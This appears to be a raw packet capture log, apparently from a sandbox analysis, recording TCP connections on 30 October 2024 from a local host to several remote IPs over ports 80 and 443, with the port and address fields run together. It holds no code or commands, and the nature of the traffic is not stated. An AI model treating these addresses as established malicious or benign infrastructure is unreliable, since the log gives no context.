                                                      Oct 30, 2024 07:57:34.131212950 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131320000 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131352901 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131403923 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131498098 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131513119 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131620884 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131628036 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131676912 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131937027 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131953955 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132203102 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132213116 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132265091 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132406950 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132425070 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132462025 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132467985 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132515907 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132801056 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132817984 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132884026 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132890940 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132934093 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.283627987 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283653975 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283874035 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283890963 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.283925056 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283974886 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284020901 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284044981 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284321070 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284337044 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284389019 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284404993 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284421921 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284765959 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284784079 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284976959 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284986019 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.285135984 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.285152912 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.285207987 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.285213947 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.325421095 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.436587095 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.436616898 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.436801910 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.436853886 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.436903954 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.437303066 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.437319994 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.437372923 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.437381983 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.437422037 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.437685013 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.437707901 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.437762022 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.437768936 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.437807083 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.438117027 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.438133001 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.438174009 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.438180923 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.438216925 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.438241005 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.438528061 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.438544035 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.438599110 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.438606024 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.438647032 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.588954926 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.588987112 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589046001 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589085102 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.589091063 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589123964 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589143991 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.589202881 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.589479923 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589508057 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589545965 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.589550018 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589596987 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.589849949 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589865923 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.589941025 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.589946032 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.590261936 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.590286016 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.590329885 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.590334892 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.590362072 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.591732025 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.591815948 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.604857922 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:36.434963942 CET4970580192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:36.440493107 CET8049705193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:36.440574884 CET4970580192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:36.441065073 CET4970580192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:36.446381092 CET8049705193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:37.132054090 CET8049705193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:37.135967016 CET4970580192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:37.141395092 CET8049705193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:37.304203033 CET8049705193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:37.352437973 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:37.352473021 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:37.352628946 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:37.356642008 CET4970580192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:37.357101917 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:37.357111931 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:37.960202932 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:37.960354090 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:37.981302023 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:37.981327057 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:37.981587887 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:38.028657913 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:38.108699083 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:38.155329943 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:38.247067928 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:38.247145891 CET44349706188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:38.247226000 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:38.252171040 CET49706443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:38.255918980 CET4970580192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:38.261370897 CET8049705193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:38.419322968 CET8049705193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:38.421910048 CET49707443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:38.421942949 CET44349707188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:52.465954065 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.465970993 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466126919 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.466133118 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466237068 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.466415882 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466434002 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466520071 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.466520071 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.466526031 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466793060 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466815948 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466849089 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.466856003 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.466882944 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.466963053 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.617911100 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.617938042 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618065119 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.618065119 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.618093014 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618199110 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.618231058 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618253946 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618321896 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.618321896 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.618330002 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618439913 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.618721008 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618740082 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618837118 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.618844986 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.618993998 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.619101048 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619117975 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619191885 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.619191885 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.619199991 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619304895 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.619545937 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619563103 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619658947 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.619666100 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619750023 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.619914055 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619934082 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.619998932 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.619998932 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.620007992 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.620179892 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.771076918 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771106958 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771190882 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.771199942 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771245003 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.771328926 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771344900 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771481037 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.771487951 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771560907 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.771775961 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771792889 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.771888018 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.771894932 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772111893 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772133112 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772142887 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.772149086 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772176981 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.772392988 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.772530079 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772547960 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772609949 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.772609949 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.772617102 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772943974 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.772963047 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.773036003 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.773036003 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.773044109 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.773483992 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.923821926 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.923846006 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.923909903 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.923938036 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.923995018 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.924314022 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.924333096 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.924412012 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.924423933 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.924474001 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.924693108 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.924710989 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.924752951 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.924772024 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.924787045 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.924974918 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.925103903 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.925127983 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.925162077 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.925170898 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.925194979 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.925206900 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.925432920 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.925451994 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.925489902 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.925502062 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:52.925513983 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:52.925555944 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.076596975 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.076623917 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.076664925 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.076685905 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.076718092 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.076745987 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.076981068 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.076999903 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077033997 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.077042103 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077069998 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.077084064 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.077348948 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077368975 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077416897 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.077425003 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077605009 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.077752113 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077773094 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077807903 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.077815056 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.077838898 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.077874899 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.078149080 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.078170061 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.078237057 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.078243971 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.078336954 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.078363895 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.078533888 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.078551054 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.078588009 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.078593969 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.078618050 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.078628063 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.080919027 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.229461908 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.229484081 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.229531050 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.229558945 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.229578972 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.229593039 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.229780912 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.229799032 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.229824066 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.229830980 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.229860067 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.229876041 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.230457067 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.230474949 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.230499983 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.230508089 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.230529070 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.230545998 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.230751991 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.230767012 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.230807066 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.230818033 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.231118917 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.231142044 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.231170893 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.231179953 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.231194019 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.231215000 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.231507063 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.231523037 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.231554985 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.231561899 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.231575012 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.231594086 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.233872890 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.382534981 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.382559061 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.382674932 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.382683039 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.382698059 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.382719994 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.382729053 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.382764101 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.382775068 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.383090019 CET44349724188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:53.383143902 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:53.389717102 CET49724443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:54.845429897 CET4975080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:54.852039099 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:54.852117062 CET4975080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:54.852499962 CET4975080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:54.858078003 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:55.525356054 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:55.529294968 CET4975080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:55.534780025 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:55.703931093 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:55.742007017 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:55.742050886 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:55.742129087 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:55.746987104 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:55.747003078 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:55.747289896 CET4975080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:55.925192118 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:55.925255060 CET4975080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:56.529671907 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:56.529761076 CET49756443192.168.2.5188.114.96.3
